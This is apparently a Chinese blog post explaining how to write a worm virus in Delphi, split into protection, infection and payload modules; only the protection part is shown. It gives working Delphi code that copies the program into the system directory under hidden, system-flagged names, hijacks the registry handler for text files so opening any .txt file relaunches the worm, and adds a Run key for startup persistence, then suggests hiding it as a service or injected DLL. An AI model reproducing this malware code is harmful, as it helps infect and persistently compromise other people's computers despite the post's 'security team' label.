用Delphi编写蠕虫病毒浅析(安全小组必看)

前言:

可能大家想到病毒,第一反应就是可能是用asm来编写,或者是vbsript,而高级语言如delphi就好象不能编写一样,其实事实并不是这个样子的,只要我们花一些时间,照样可以写出简短而高效的病毒程序来,一点也不输那些用汇编写出来的程序哦。

一个病毒程序首先要短小,我们的目标是经过压缩后控制在30k以下。用过delphi的朋友都知道,如果在uses里面加入forms,classes.....等就会使目标文件非常的大,所以,在我们的程序里,我们要尽可能的不用这些库。我们只用windows,winsock,shellapi,sysutils(这个里面包含了一些常用的函数,比如对文件的操作,对字符串的操作,如果用自己的程序来代替,目标文件会更加的小)

首先,我们知道,一个病毒程序一般都分下面三个模块:

①保护模块;

②感染模块;

③发作模块。

下面我们就从这三个模块开始,分别实现他们的代码。

一)保护模块。

一般,我们都是把自身拷贝到系统的一些目录里,比如%systemroot%。那么,我们首先要取得这些特定的目录的路径sdk里面给我们提供了一个这样的函数GetSystemDirectory :

UINT GetSystemDirectory(
LPTSTR lpBuffer, // 存放返回的字符串的缓冲区
UINT uSize // 上面的缓冲去的长度
);
 
相关的函数还有GetWindowsDirectory可以得到%windows%的路径

得到了系统的目录后,第二步就是拷贝文件了。sdk为我们提供了一个函数copyfile :

BOOL CopyFile(
LPCTSTR lpExistingFileName, // 源文件的路径
LPCTSTR lpNewFileName, // 目标文件的路径
BOOL bFailIfExists // 这是一个标志,如果目标文件已经存在,是否强制覆盖
);
 
拷贝文件完毕后,我们来把这个文件设置为系统和隐藏,那么一般情况是看不见该文件的,除非选取查看所有文件,以及显示受保护文件。 同样,介绍一个函数SetFileAttributes :

BOOL SetFileAttributes(
LPCTSTR lpFileName, // 需要设置的文件的文件名
DWORD dwFileAttributes // 设置的值。
);
 
我们这里要设置为隐藏和系统,那么就为第二个参数传递FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM

下面就是最重要的,让该文件开机自动运行,我们一般都是写注册表,首先用RegOpenKey函数来打开一个键。

LONG RegOpenKey(
HKEY hKey, // 主键,比如HKEY_LOCAL_MACHINE
LPCTSTR lpSubKey, // 跟随的subkey
PHKEY phkResult // 存放函数返回这个打开的键的句柄
);
 
得到了HKEY后,就可以用regsetvalueex来向该键写具体的值了。

LONG RegSetvalueEx(
HKEY hKey, // 这个就是刚才我们得到的句柄
LPCTSTR lpvalueName, // 键名的地址
DWORD Reserved, // 一般设置为0
DWORD dwType, // 我们写的键的类型,字符串为REG_SZ
CONST BYTE *lpData, // 键值的地址
DWORD cbData // 写入的键值的长度
);
 
下面,我综合上面的说明来给出一个简短的例子:

procedure SelfCopy;
var
Path,value:array [0..255] of char;
Hk:HKEY;
S:string;
begin
GetSystemDirectory(Path,256);
//取得系统的路径
s:=strpas(Path);
//转换成字符串
CopyFile(pchar(paramstr(0)),pchar(S+'/ruin.exe'),false);
CopyFile(pchar(paramstr(0)),pchar(S+'/virus_ruin.exe'),false);
//把自身拷贝到系统目录下为ruin.exe,virus_ruin.exe
SetFileAttributes(pchar(S+'/ruin.exe'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(pchar(S+'/virus_ruin.exe'),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
//设置刚才的两个文件为系统和隐藏
RegOpenKey(HKEY_CLASSES_ROOT,'txtfile\shell\open\command',Hk);
value:='virus_ruin.exe %1';
RegSetvalueEx(Hk,'',0,REG_SZ,@value,17);
//把virus_ruin.exe和文本文件关联
RegOpenKey(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\Run',Hk);
value:='ruin.exe';
RegSetvalueEx(Hk,'ruin',0,REG_SZ,@value,8);
//设置开机自动运行ruin.exe
end;

 
我们看上面的这个程序,就完成了自我复制,和开机自动运行,并且关联了文本文件,这样,如果run下的键被删除,那么他打开文本文件,蠕虫文件又被激活。

不过这个样子,你就需要在你的主程序里面进行判断,如果传递的参数等于1 ,则打开该文本,并且进行自我保护。

如:

begin
if paramcount=1 then
shellexecute(0,‘open‘,‘notepad.exe‘,pchar(paramstr(1)),nil,sw_normal);
//其他的代码
 
这里,我只是给出一个简单的例子来描述出一个大概的思路,很多地方还不完善,比如进程的隐藏,你可以进行判断,如果是98你可以registerserverapplication如果你是用的2000,你可以做为服务启动,或者是插入dll,或者是用求职信的方法,开机加载一个dll,或者是win.ini。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值